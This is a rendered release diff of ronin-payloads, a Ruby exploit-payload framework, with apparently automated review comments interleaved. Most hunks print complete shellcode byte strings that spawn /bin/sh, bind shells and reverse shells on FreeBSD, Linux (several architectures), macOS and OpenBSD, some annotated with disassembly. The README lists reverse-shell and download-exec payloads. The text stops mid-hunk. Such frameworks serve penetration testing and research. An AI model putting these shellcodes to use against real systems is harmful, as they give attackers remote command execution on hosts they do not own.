ronin-payloads 0.2.0.rc1 → 0.2.0
- checksums.yaml +4 -4
- data/.rubocop.yml +3 -0
- data/.ruby-version +1 -1
- data/ChangeLog.md +8 -1
- data/README.md +17 -10
- data/data/completions/ronin-payloads +33 -33
- data/gemspec.yml +1 -1
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/arm/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/arm/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/arm/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/mips/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/mips/exec_shell.rb +13 -12
- data/lib/ronin/payloads/builtin/shellcode/linux/mips/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb +15 -14
- data/lib/ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/exec_shell.rb +11 -10
- data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/reverse_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/exec_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/bind_shell.rb +2 -1
- data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/exec_shell.rb +13 -12
- data/lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb +21 -20
- data/lib/ronin/payloads/builtin/test/cmd.rb +1 -1
- data/lib/ronin/payloads/builtin/test/open_redirect.rb +4 -1
- data/lib/ronin/payloads/builtin/test/url.rb +1 -1
- data/lib/ronin/payloads/builtin/test/xss.rb +4 -1
- data/lib/ronin/payloads/cli.rb +2 -0
- data/lib/ronin/payloads/version.rb +1 -1
- metadata +5 -5
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 652a98c495b84d3a9c198fb5c9c7a2cde8fe6b2d55439e6a62cb6b8e39c56e35
|
4
|
+
data.tar.gz: 03f33b7a86f0990b27d1e5f72a08222b3da758f20c275a9b78251aec24289ccd
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: f24494cee6f75c9d3fc56a5ff006d4c1923420cd7129707ad1eb88e01c2c9ce92a7739cbc4aab0010291a771589b8e90098fc6a9647ab340fe6071c30bfed863
|
7
|
+
data.tar.gz: f455db818586a0c15148ecc318bded23a0295fca56faf56d5f01dfd74798ede1c358bff28f033d77f4b38cb7710f3477b8a4c6d9283d1206a7b76d5e49bafc69
|
data/.rubocop.yml
CHANGED
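--- a/data/.ruby-version
+++ b/data/.ruby-version
@@ -1 +1 @@
-ruby-3.
+ruby-3.3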
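--- a/data/ChangeLog.md
+++ b/data/ChangeLog.md
@@ -1,4 +1,4 @@
-### 0.2.0 / 2024-
+### 0.2.0 / 2024-07-22
 
 * Added the {Ronin::Payloads::GroovyPayload} payload class.
 * Added the {Ronin::Payloads::NashornPayload} payload class.
@@ -43,6 +43,13 @@
 `ronin-payloads build` command for the given payload.
 * Renamed the `-e` option flag to `-E` in `ronin-payloads build`.
 
+### 0.1.6 / 2024-07-01
+
+#### Payloads
+
+* Fixed `incompatible character encodings: UTF-8 and ASCII-8BIT` exceptions when
+building shellcode payloads with certain IP addresses or port numbers.
+
 ### 0.1.5 / 2024-06-19
 
 * Fixed order of arguments passed to `TCPServer.new` in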
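--- a/data/README.md
+++ b/data/README.md
@@ -126,13 +126,17 @@ $ ronin-payloads list
 cmd/awk/reverse_shell
 cmd/bash/reverse_shell
 cmd/lua/reverse_shell
+cmd/netcat/bind_shell
 cmd/node/reverse_shell
 cmd/openssl/reverse_shell
 cmd/perl/reverse_shell
 cmd/php/reverse_shell
+cmd/ping
 cmd/powershell/reverse_shell
 cmd/python/reverse_shell
 cmd/ruby/reverse_shell
+cmd/sleep
+cmd/touch
 cmd/windows/download
 cmd/zsh/reverse_shell
 groovy/reverse_shell
@@ -142,31 +146,33 @@ $ ronin-payloads list
 php/cmd_exec
 php/download_exec
 shellcode/freebsd/x86/bind_shell
-shellcode/freebsd/x86/
+shellcode/freebsd/x86/exec_shell
 shellcode/freebsd/x86/reverse_shell
-shellcode/freebsd/x86_64/
+shellcode/freebsd/x86_64/exec_shell
 shellcode/linux/arm/bind_shell
-shellcode/linux/arm/
+shellcode/linux/arm/exec_shell
 shellcode/linux/arm/reverse_shell
 shellcode/linux/mips/bind_shell
-shellcode/linux/mips/
+shellcode/linux/mips/exec_shell
 shellcode/linux/mips/reverse_shell
-shellcode/linux/ppc/
+shellcode/linux/ppc/exec_shell
 shellcode/linux/ppc/reverse_shell
 shellcode/linux/x86/bind_shell
-shellcode/linux/x86/
+shellcode/linux/x86/exec_shell
 shellcode/linux/x86/reverse_shell
 shellcode/linux/x86_64/bind_shell
-shellcode/linux/x86_64/
+shellcode/linux/x86_64/exec_shell
 shellcode/linux/x86_64/reverse_shell
-shellcode/macos/x86_64/
+shellcode/macos/x86_64/exec_shell
 shellcode/macos/x86_64/reverse_shell
-shellcode/netbsd/x86/
+shellcode/netbsd/x86/exec_shell
 shellcode/netbsd/x86/reverse_shell
 shellcode/openbsd/x86/bind_shell
-shellcode/openbsd/x86/
+shellcode/openbsd/x86/exec_shell
 shellcode/windows/x86_64/cmd
+test/cmd
 test/open_redirect
+test/url
 test/xss
 ```
 
@@ -234,6 +240,7 @@ $ git push
 Define a `/bin/sh` shellcode payload:
 
 ```ruby
+# encoding: ASCII-8BIT
 require 'ronin/payloads/shellcode_payload'
 
 module Ronin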
@@ -11,7 +11,7 @@ _ronin-payloads_completions_filter() {
|
|
11
11
|
|
12
12
|
if [[ "${cur:0:1}" == "-" ]]; then
|
13
13
|
echo "$words"
|
14
|
-
|
14
|
+
|
15
15
|
else
|
16
16
|
for word in $words; do
|
17
17
|
[[ "${word:0:1}" != "-" ]] && result+=("$word")
|
@@ -29,99 +29,99 @@ _ronin-payloads_completions() {
|
|
29
29
|
|
30
30
|
case "$compline" in
|
31
31
|
'encode'*'--encoder')
|
32
|
-
while read -r; do COMPREPLY+=(
|
32
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur")
|
33
33
|
;;
|
34
34
|
|
35
35
|
'build'*'--encoder')
|
36
|
-
while read -r; do COMPREPLY+=(
|
36
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur")
|
37
37
|
;;
|
38
38
|
|
39
39
|
'build'*'--output')
|
40
|
-
while read -r; do COMPREPLY+=(
|
40
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
41
41
|
;;
|
42
42
|
|
43
43
|
'encoder'*'--file')
|
44
|
-
while read -r; do COMPREPLY+=(
|
44
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
45
45
|
;;
|
46
46
|
|
47
47
|
'launch'*'--file')
|
48
|
-
while read -r; do COMPREPLY+=(
|
48
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
49
49
|
;;
|
50
50
|
|
51
51
|
'build'*'--file')
|
52
|
-
while read -r; do COMPREPLY+=(
|
52
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
53
53
|
;;
|
54
54
|
|
55
55
|
'show'*'--file')
|
56
|
-
while read -r; do COMPREPLY+=(
|
56
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
57
57
|
;;
|
58
58
|
|
59
59
|
'completion'*)
|
60
|
-
while read -r; do COMPREPLY+=(
|
60
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--print --install --uninstall")" -- "$cur")
|
61
61
|
;;
|
62
62
|
|
63
63
|
'encoder'*'-f')
|
64
|
-
while read -r; do COMPREPLY+=(
|
64
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
65
65
|
;;
|
66
66
|
|
67
|
-
'
|
68
|
-
while read -r; do COMPREPLY+=(
|
67
|
+
'encode'*'-E')
|
68
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur")
|
69
69
|
;;
|
70
70
|
|
71
|
-
'
|
72
|
-
while read -r; do COMPREPLY+=(
|
71
|
+
'launch'*'-f')
|
72
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
73
73
|
;;
|
74
74
|
|
75
|
-
'build'*'-
|
76
|
-
while read -r; do COMPREPLY+=(
|
75
|
+
'build'*'-E')
|
76
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur")
|
77
77
|
;;
|
78
78
|
|
79
79
|
'build'*'-o')
|
80
|
-
while read -r; do COMPREPLY+=(
|
80
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
81
81
|
;;
|
82
82
|
|
83
|
-
'build'*'-
|
84
|
-
while read -r; do COMPREPLY+=(
|
83
|
+
'build'*'-f')
|
84
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
85
85
|
;;
|
86
86
|
|
87
87
|
'encoder'*)
|
88
|
-
while read -r; do COMPREPLY+=(
|
88
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--verbose -v --file -f $(ronin-payloads encoders)")" -- "$cur")
|
89
89
|
;;
|
90
90
|
|
91
91
|
'show'*'-f')
|
92
|
-
while read -r; do COMPREPLY+=(
|
92
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -A file -- "$cur")
|
93
93
|
;;
|
94
94
|
|
95
|
-
'
|
96
|
-
while read -r; do COMPREPLY+=(
|
95
|
+
'launch'*)
|
96
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--file -f --param -p --debug -D $(ronin-payloads list)")" -- "$cur")
|
97
97
|
;;
|
98
98
|
|
99
|
-
'
|
100
|
-
while read -r; do COMPREPLY+=(
|
99
|
+
'encode'*)
|
100
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--format -F --encoder -E --param -p --string -s")" -- "$cur")
|
101
101
|
;;
|
102
102
|
|
103
103
|
'build'*)
|
104
|
-
while read -r; do COMPREPLY+=(
|
104
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--file -f --format -F --param -p --output -o --encoder -E --encoder-param --debug -D $(ronin-payloads list)")" -- "$cur")
|
105
105
|
;;
|
106
106
|
|
107
|
-
'
|
108
|
-
while read -r; do COMPREPLY+=(
|
107
|
+
'info'*)
|
108
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads list)")" -- "$cur")
|
109
109
|
;;
|
110
110
|
|
111
|
-
'
|
112
|
-
while read -r; do COMPREPLY+=(
|
111
|
+
'show'*)
|
112
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--file -f --verbose -v $(ronin-payloads list)")" -- "$cur")
|
113
113
|
;;
|
114
114
|
|
115
115
|
'new'*)
|
116
|
-
while read -r; do COMPREPLY+=(
|
116
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--type -t --author -a --author-email -e --summary -S --description -D --reference -R")" -- "$cur")
|
117
117
|
;;
|
118
118
|
|
119
119
|
*)
|
120
|
-
while read -r; do COMPREPLY+=(
|
120
|
+
while read -r; do COMPREPLY+=("$REPLY"); done < <(compgen -W "$(_ronin-payloads_completions_filter "--version -V help build completion encode encoder encoders irb launch list new show ls info")" -- "$cur")
|
121
121
|
;;
|
122
122
|
|
123
123
|
esac
|
124
124
|
} &&
|
125
|
-
complete -F _ronin-payloads_completions ronin-payloads
|
125
|
+
complete -F _ronin-payloads_completions ronin-payloads
|
126
126
|
|
127
127
|
# ex: filetype=sh
|
data/gemspec.yml
CHANGED
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -58,7 +59,7 @@ module Ronin
|
|
58
59
|
"\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff" \
|
59
60
|
"\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01" \
|
60
61
|
"\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff" \
|
61
|
-
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"
|
62
|
+
"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"
|
62
63
|
end
|
63
64
|
|
64
65
|
end
|
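Review bot: `# encoding: ASCII-8BIT` is honoured by Ruby only when it is the first line of the file (or the second, after a shebang); the hunk does place it above `# frozen_string_literal: true` as line 1, which is correct, but nothing in the change pins that, so a later header reshuffle that moves it down would silently bring back the `incompatible character encodings` failure the ChangeLog says this release fixes. A spec that builds each shellcode payload and asserts `payload.encoding == Encoding::ASCII_8BIT` would guard the whole set; the spec directory is not on this page, so it may already exist. The replaced last line of the `@payload` literal reads identically on both sides in this rendering, so whatever coercion it dropped cannot be checked from here. The same applies to every other `# encoding: ASCII-8BIT` hunk below, through the `windows/x86_64/cmd` file.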
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -53,7 +54,7 @@ module Ronin
|
|
53
54
|
def build
|
54
55
|
@payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68" \
|
55
56
|
"\x68\x2f\x62\x69\x6e\x89\xe3\x50" \
|
56
|
-
"\x54\x53\xb0\x3b\x50\xcd\x80"
|
57
|
+
"\x54\x53\xb0\x3b\x50\xcd\x80"
|
57
58
|
end
|
58
59
|
|
59
60
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -56,7 +57,7 @@ module Ronin
|
|
56
57
|
"\xe1\x6a\x10\x51\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc9" \
|
57
58
|
"\x51\x52\x31\xc0\xb0\x5a\x50\xcd\x80\xfe\xc1\x80\xf9\x03" \
|
58
59
|
"\x75\xf0\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" \
|
59
|
-
"\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"
|
60
|
+
"\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"
|
60
61
|
end
|
61
62
|
|
62
63
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -53,7 +54,7 @@ module Ronin
|
|
53
54
|
def build
|
54
55
|
@payload = "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" \
|
55
56
|
"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" \
|
56
|
-
"\x54\x5f\x52\x57\x54\x5e\x0f\x05"
|
57
|
+
"\x54\x5f\x52\x57\x54\x5e\x0f\x05"
|
57
58
|
end
|
58
59
|
|
59
60
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -119,7 +120,7 @@ module Ronin
|
|
119
120
|
"\x08\x00\x8d\xe2" \
|
120
121
|
"\x00\x10\x8d\xe2" \
|
121
122
|
"\x04\x20\x8d\xe2" \
|
122
|
-
"\x0b\x00\x90\xef"
|
123
|
+
"\x0b\x00\x90\xef"
|
123
124
|
end
|
124
125
|
|
125
126
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -60,7 +61,7 @@ module Ronin
|
|
60
61
|
"\xc2\x51\x03\x37" \
|
61
62
|
"\x01\xdf\x2f\x62" \
|
62
63
|
"\x69\x6e\x2f\x2f" \
|
63
|
-
"\x73\x68"
|
64
|
+
"\x73\x68"
|
64
65
|
end
|
65
66
|
|
66
67
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -72,7 +73,7 @@ module Ronin
|
|
72
73
|
"#{packed_port}" \
|
73
74
|
"#{packed_ipv4}" \
|
74
75
|
\
|
75
|
-
"/bin/sh\0"
|
76
|
+
"/bin/sh\0"
|
76
77
|
end
|
77
78
|
|
78
79
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -118,7 +119,7 @@ module Ronin
|
|
118
119
|
"\xf0\xff\xa5\x23" \
|
119
120
|
"\xab\x0f\x02\x24" \
|
120
121
|
"\x0c\x01\x01\x01" \
|
121
|
-
"/bin/sh"
|
122
|
+
"/bin/sh"
|
122
123
|
end
|
123
124
|
|
124
125
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -51,18 +52,18 @@ module Ronin
|
|
51
52
|
# Builds the shellcode.
|
52
53
|
#
|
53
54
|
def build
|
54
|
-
@payload = "\x28\x06\xff\xff"
|
55
|
-
"\x3c\x0f\x2f\x2f"
|
56
|
-
"\x35\xef\x62\x69"
|
57
|
-
"\xaf\xaf\xff\xf4"
|
58
|
-
"\x3c\x0e\x6e\x2f"
|
59
|
-
"\x35\xce\x73\x68"
|
60
|
-
"\xaf\xae\xff\xf8"
|
61
|
-
"\xaf\xa0\xff\xfc"
|
62
|
-
"\x27\xa4\xff\xf4"
|
63
|
-
"\x28\x05\xff\xff"
|
64
|
-
"\x24\x02\x0f\xab"
|
65
|
-
"\x01\x01\x01\x0c"
|
55
|
+
@payload = "\x28\x06\xff\xff" + # slti a2,zero,-1
|
56
|
+
"\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f
|
57
|
+
"\x35\xef\x62\x69" + # ori t7,t7,0x6269
|
58
|
+
"\xaf\xaf\xff\xf4" + # sw t7,-12(sp)
|
59
|
+
"\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f
|
60
|
+
"\x35\xce\x73\x68" + # ori t6,t6,0x7368
|
61
|
+
"\xaf\xae\xff\xf8" + # sw t6,-8(sp)
|
62
|
+
"\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
|
63
|
+
"\x27\xa4\xff\xf4" + # addiu a0,sp,-12
|
64
|
+
"\x28\x05\xff\xff" + # slti a1,zero,-1
|
65
|
+
"\x24\x02\x0f\xab" + # li v0,4011
|
66
|
+
"\x01\x01\x01\x0c" # syscall 0x40404
|
66
67
|
end
|
67
68
|
|
68
69
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -100,7 +101,7 @@ module Ronin
|
|
100
101
|
"\x27\xa4\xff\xf4" \
|
101
102
|
"\x28\x05\xff\xff" \
|
102
103
|
"\x24\x02\x0f\xab" \
|
103
|
-
"\x01\x01\x01\x0c"
|
104
|
+
"\x01\x01\x01\x0c"
|
104
105
|
end
|
105
106
|
|
106
107
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -51,20 +52,20 @@ module Ronin
|
|
51
52
|
# Builds the shellcode.
|
52
53
|
#
|
53
54
|
def build
|
54
|
-
@payload = "\x7c\x3f\x0b\x78"
|
55
|
-
"\x7c\xa5\x2a\x79"
|
56
|
-
"\x42\x40\xff\xf9"
|
57
|
-
"\x7f\x08\x02\xa6"
|
58
|
-
"\x3b\x18\x01\x34"
|
59
|
-
"\x98\xb8\xfe\xfb"
|
60
|
-
"\x38\x78\xfe\xf4"
|
61
|
-
"\x90\x61\xff\xf8"
|
62
|
-
"\x38\x81\xff\xf8"
|
63
|
-
"\x90\xa1\xff\xfc"
|
64
|
-
"\x3b\xc0\x01\x60"
|
65
|
-
"\x7f\xc0\x2e\x70"
|
66
|
-
"\x44\xde\xad\xf2"
|
67
|
-
"/bin/shZ"
|
55
|
+
@payload = "\x7c\x3f\x0b\x78" + # mr r31,r1
|
56
|
+
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5
|
57
|
+
"\x42\x40\xff\xf9" + # bdzl+ 10000454< main>
|
58
|
+
"\x7f\x08\x02\xa6" + # mflr r24
|
59
|
+
"\x3b\x18\x01\x34" + # addi r24,r24,308
|
60
|
+
"\x98\xb8\xfe\xfb" + # stb r5,-261(r24)
|
61
|
+
"\x38\x78\xfe\xf4" + # addi r3,r24,-268
|
62
|
+
"\x90\x61\xff\xf8" + # stw r3,-8(r1)
|
63
|
+
"\x38\x81\xff\xf8" + # addi r4,r1,-8
|
64
|
+
"\x90\xa1\xff\xfc" + # stw r5,-4(r1)
|
65
|
+
"\x3b\xc0\x01\x60" + # li r30,352
|
66
|
+
"\x7f\xc0\x2e\x70" + # srawi r0,r30,5
|
67
|
+
"\x44\xde\xad\xf2" + # .long 0x44deadf2
|
68
|
+
"/bin/shZ" # the last byte becomes NULL
|
68
69
|
end
|
69
70
|
|
70
71
|
end
|
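Review bot: The disassembly comment on the third line of the new `@payload` expression is garbled — `# bdzl+ 10000454< main>` has the space inside the angle brackets; it should read `# bdzl+ 10000454 <main>`. The closing `# the last byte becomes NULL` comment would be more useful if it named the instruction responsible, e.g. `"/bin/shZ" # trailing 'Z' is overwritten with 0 by the stb r5,-261(r24) above`; that r5 is zero follows from the `xor. r5,r5,r5` comment, and -261 is the offset of the `Z` relative to the `addi r3,r24,-268` string base, though I am reading the offsets from the comments rather than decoding the bytes. The `build` method is complete within the hunk; the class header and any arch/OS declarations are outside it.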
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -125,7 +126,7 @@ module Ronin
|
|
125
126
|
"\x3b\xc0\x01\x60" \
|
126
127
|
"\x7f\xc0\x2e\x70" \
|
127
128
|
"\x44\xde\xad\xf2" \
|
128
|
-
"/bin/shZ"
|
129
|
+
"/bin/shZ"
|
129
130
|
end
|
130
131
|
|
131
132
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -98,7 +99,7 @@ module Ronin
|
|
98
99
|
"\x68\x2f\x62\x69\x6e" \
|
99
100
|
"\x89\xe3" \
|
100
101
|
"\xb0\x0b" \
|
101
|
-
"\xcd\x80"
|
102
|
+
"\xcd\x80"
|
102
103
|
end
|
103
104
|
|
104
105
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -54,7 +55,7 @@ module Ronin
|
|
54
55
|
def build
|
55
56
|
@payload = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f" \
|
56
57
|
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd" \
|
57
|
-
"\x80"
|
58
|
+
"\x80"
|
58
59
|
end
|
59
60
|
|
60
61
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -62,7 +63,7 @@ module Ronin
|
|
62
63
|
"\xc0\x52\x68\x6e\x2f\x73\x68\x68" \
|
63
64
|
"\x2f\x2f\x62\x69\x89\xe3\x52\x53" \
|
64
65
|
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd" \
|
65
|
-
"\x80"
|
66
|
+
"\x80"
|
66
67
|
end
|
67
68
|
|
68
69
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -59,7 +60,7 @@ module Ronin
|
|
59
60
|
"\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" \
|
60
61
|
"\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" \
|
61
62
|
"\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" \
|
62
|
-
"\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"
|
63
|
+
"\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05"
|
63
64
|
end
|
64
65
|
|
65
66
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -51,16 +52,16 @@ module Ronin
|
|
51
52
|
# Builds the shellcode.
|
52
53
|
#
|
53
54
|
def build
|
54
|
-
@payload = "\x48\x31\xd2"
|
55
|
-
"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"
|
56
|
-
"\x48\xc1\xeb\x08"
|
57
|
-
"\x53"
|
58
|
-
"\x48\x89\xe7"
|
59
|
-
"\x50"
|
60
|
-
"\x57"
|
61
|
-
"\x48\x89\xe6"
|
62
|
-
"\xb0\x3b"
|
63
|
-
"\x0f\x05"
|
55
|
+
@payload = "\x48\x31\xd2" + # xor %rdx, %rdx
|
56
|
+
"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" + # mov $0x68732f6e69622f2f, %rbx
|
57
|
+
"\x48\xc1\xeb\x08" + # shr $0x8, %rbx
|
58
|
+
"\x53" + # push %rbx
|
59
|
+
"\x48\x89\xe7" + # mov %rsp, %rdi
|
60
|
+
"\x50" + # push %rax
|
61
|
+
"\x57" + # push %rdi
|
62
|
+
"\x48\x89\xe6" + # mov %rsp, %rsi
|
63
|
+
"\xb0\x3b" + # mov $0x3b, %al
|
64
|
+
"\x0f\x05" # syscall
|
64
65
|
end
|
65
66
|
|
66
67
|
end
|
@@ -1,3 +1,4 @@
|
|
1
|
+
# encoding: ASCII-8BIT
|
1
2
|
# frozen_string_literal: true
|
2
3
|
#
|
3
4
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
@@ -58,7 +59,7 @@ module Ronin
|
|
58
59
|
"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" \
|
59
60
|
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" \
|
60
61
|
